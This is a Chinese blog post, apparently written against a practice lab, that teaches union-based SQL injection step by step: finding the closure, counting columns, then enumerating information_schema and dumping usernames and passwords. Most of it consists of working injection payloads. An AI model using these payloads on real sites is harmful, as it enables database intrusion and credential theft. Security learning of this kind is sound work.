sql注入【3】

最新推荐文章于 2024-06-22 19:58:58 发布
最新推荐文章于 2024-06-22 19:58:58 发布
阅读量883 收藏 17
点赞数 21
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LfanBQX/article/details/136716921
版权

1.判断是字符型还是数字型

a. 构造payload为:id=1 order by 9999 --+

如果正确返回页面,则为字符型,否则,为数字型

b.构造payload:
数字型:?/ id=1 and 1=1            ?/ id=1 and 1=2      报错为数字型
字符型:?/ id=1' and 1=1--空abc            ?/ id=1' and 1=2--空abc       报错为字符型,abc存在的意义就是防止空格被省略,所以可以为任何字母几个都可以


c.字符型SQL注入第一步判断闭合:
首先尝试:?id=1'    和       ?id=1"


1'和1" 如果都报错,则为整形闭合。如果单引号报错,双引号不报错。
然后尝试?id=1'–+无报错则单引号闭合。报错则单引号加括号。

3如果单引号不报错,双引号报错。
然后尝试  ?id=1"–+
无报错则双引号闭合。报错则双引号加括号,多层括号同理

闭合方式:单引号',双引号",单引号+括号'),双引号+括号"),单引号+双括号')),双引号+双括号")),

2、确定是否有注入点

?id=1 and 1=1#--空a和?id=1 and 1=2#--空a

 and 1=1#是验证是否有注入点 and 1=2#来确定是不是一定有注入点。

 3、确定字段个数

?id=1 order by N--空a

从1到N一个一个尝试直到报错确定个数为N-1。   

4、查找显示位

?id=-1 union select 1,2,3--空a

此处需要把id设置位不存在的值的目的是为了union联合查询让出显示位。

这里的1,2,3代表N-1的个数,显示的数字说明第几个字段可以找显示位。

说明第二位和第三位都能找显示位

5、查出库

 ?id=-1 union select 1,2,database()--空a

找到显示位后查询database找到当前的库。

说明当前的库是security

6、查找库里的所有表

? id=-1' union select 1,database(),table_name from information_schema.tables where table_schema='security'-- a

说明当前的库是security,里面有表emails
若觉得emails表里数据不重要,可通过group_concat(将所有的结果进行拼接展示)和limit(限制查询结果的行数),建议使用limit,因为如果网站源码设的显示位数少,那使用group_concat会导致表名显示不全,若使用显示不全的表,会导致库中无此表情况出现。
id=-1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema='security'-- a

id=-1' union select 1,database(),table_name from information_schema.tables where table_schema='security' limit 0,1-- a


limit显示第一张表为limit 0,1;显示第二张表为limit 1,1;显示第三张表为limit 2,1;显示第四张表为limit 3,1........

7、查找某表里的所有列

id=-1' union select 1,database(),column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1-- a



用limit一个个查,发现存在三列,分别是id,username,password

8、脱库

 id=-1' union select 1,2,username from users limit 0,1-- a


也可用group_concat查询库中数据

LfanBQX
关注
  • 21
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sql注入详解
good good study
05-05 19万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入攻击与防护
weixin_62707591的博客
06-21 5562
攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,并且插入的恶意SQL命令会导致原有SQL语句作用发生改变,从而得到欺骗服务器执行恶意SQL命令的一种攻击方式。① 概述开源的自动化SQL注入工具,由Python写成② 主要功能扫描、发现、利用给定URL的SQL注入漏洞③ 特点。
sql注入3之空格过滤
这周末在做梦的博客
10-02 1380
空格过滤的十三中脚本,由于本人比较偏爱sqlmap所以,在这里只留下了sql的空格过滤方式 –tamper “脚本名称”
SQL注入攻击介绍
热门推荐
99度灰的博客
03-30 2万+
SQL注入攻击介绍 一、SQL注入攻击简介 SQL注入攻击是指,后台数据库操作时,如果拼接外部参数到SQL语句中,就可能导致欺骗服务器执行恶意的SQL语句,造成数据泄露、删库、页面篡改等严重后果。按变量类型分为:数字型、字符型;按HTTP提交方式分为:GET注入、POST注入、Cookie注入;按注入方式分为:报错注入、盲注(布尔盲注、时间盲注)、堆叠注入等等。 二、SQL注入分类 按变量类型分类:如SQL语句为select *from user where param=1(数字型)、select *fr
细说——SQL注入
LainWith的博客
10-09 7702
目录SQL是什么?什么是SQL注入漏洞原理漏洞原因为什么会有SQL注入注⼊点可能存在的位置漏洞危害提交方法判断注入点判断字符型还是数字型sql注入绕过获取网站路径SQL 注入读写文件1. 数据库支持文件读写2. 当前用户具有文件权限3. 知道文件绝对路径查询方式及报错盲注⭐查询方式报错盲注报错注入函数二次注入原理实施步骤举例堆叠查询DNSlog脑图常见数据库,及注入相关⭐注释符、数据库端口数据库文件后缀名特有的数据库查看当前用户或权限ASCII转换函数不同数据库注入结果的区别⭐Sql注入中连接字符串常用函数
SQL注入
m0_51457307的博客
11-08 2万+
一、什么是SQL注入 SQL注入SQL lnjection)是发生在Web程序中数据库层的安全漏洞,是比较常用的网络攻击方式之一,他不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至修改数据库。也就是说,SQL注入就是在用户输入的字符串中添加SQL语句,如果在设计不良的程序中忽略了检查,那么这些注入进去的SQL语句就会被数据库服务器误认为是正常的SQL语句而运行,攻击者就可以执行计划外的命令或者访问未授权的数据。 二、SQL注入的原理 1.恶意拼接查
SQL 注入攻击介绍
代码星辰的博客
03-12 4609
SQL 注入攻击介绍
sql注入
leekos的博客,分享web安全相关知识~
12-06 1939
sql提交注入
Sql注入示例
我想我是海 冬天的大海 心情随风轻摆
05-19 1228
Sql注入是我们经常听说的,具体极大的风险性,下面给一个比较直观的示例:
SQL注入的常见方式
LainWith的博客
10-09 7063
目录联合查询(union)函数介绍order byunion select操作布尔盲注 (and or)函数介绍mid 从中间截取字符left 从左开始截取字符ord、ascii 转成ascii码length 统计长度andregexp 正则注入-针对MySQL操作1. 猜数据库长度2. 猜数据库名 (配合BurpSuite)3. 猜表的个数4. 猜表5. 猜列6. 猜值延时注入(sleep if)函数操作1. 猜数据库长度2. 猜数据库名3. 猜表名4. 猜测 users 表的列5. 猜值宽字节注入引子
sql注入讲解ppt.pptx
08-10
3. 时间延迟型 SQL 注入:使用时间延迟来注入 SQL 语句。 4. 布尔盲注:使用布尔逻辑来注入 SQL 语句。 七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。 2. 联合查询:使用 UNION keyword 来连接两个查询...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL 注入天书.pdf
08-06
SQL 注入学习天书
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
SQLAlchemy 连接池
youhebuke225的博客
06-17 261
调整这些参数可以帮助你更好地管理数据库连接,并减少因连接超时或服务器断开连接而导致的问题。记得根据你的应用程序的需求和数据库服务器的配置来合理设置这些参数。在 SQLAlchemy 中,确实可以通过配置连接池的参数来管理连接的超时和回收,从而确保连接在需要时能够被重新建立。SQLAlchemy 使用的是。作为其默认的连接池实现。为了配置这些参数,你可以在创建引擎时将它们传递给。
任务4.8.4 利用Spark SQL实现分组排行榜
最新发布
howard2005的专栏
06-22 528
本实战任务展示了如何使用Spark SQL对数据进行分组和TopN计算,这是大数据领域中常见的数据处理需求。通过Spark SQL的窗口函数,可以方便地实现复杂的数据分析任务。
【AI+编程】工作日常场景随时可以AI编程,记一个问答SQL快速导出数据日常示例
月晓风清
06-15 486
为了实现你需要的操作,即以问题名称作为表头,答案作为内容导出,你可以通过JOIN操作连接三个表,然后利用动态SQL语句进行行转列转换(PIVOT)。然后通过执行这个动态生成的SQL,你可以得到一个表格,表中的每一行表示一个成员,对应每个问题的答案作为列数据。然后,在动态生成的SQL语句中利用JOIN把db_member、db_question和db_answer连接起来,并根据question_id和member_id进行匹配,以输出每个成员对应的问题答案。下面是假定表结构,实际场景和它类似。
PostgreSQL源码分析——INSERT
让我思考一下
06-18 330
这里我们对INSERT语句进行分析, 只分析其宏观过程,具体细节后续再分析。我们就分析下面的语句的执行过程。
sql注入sql注入
05-02
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的数据库操作。攻击者可以利用这个漏洞来绕过身份验证、获取敏感数据、修改数据或者执行其他恶意操作。 为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值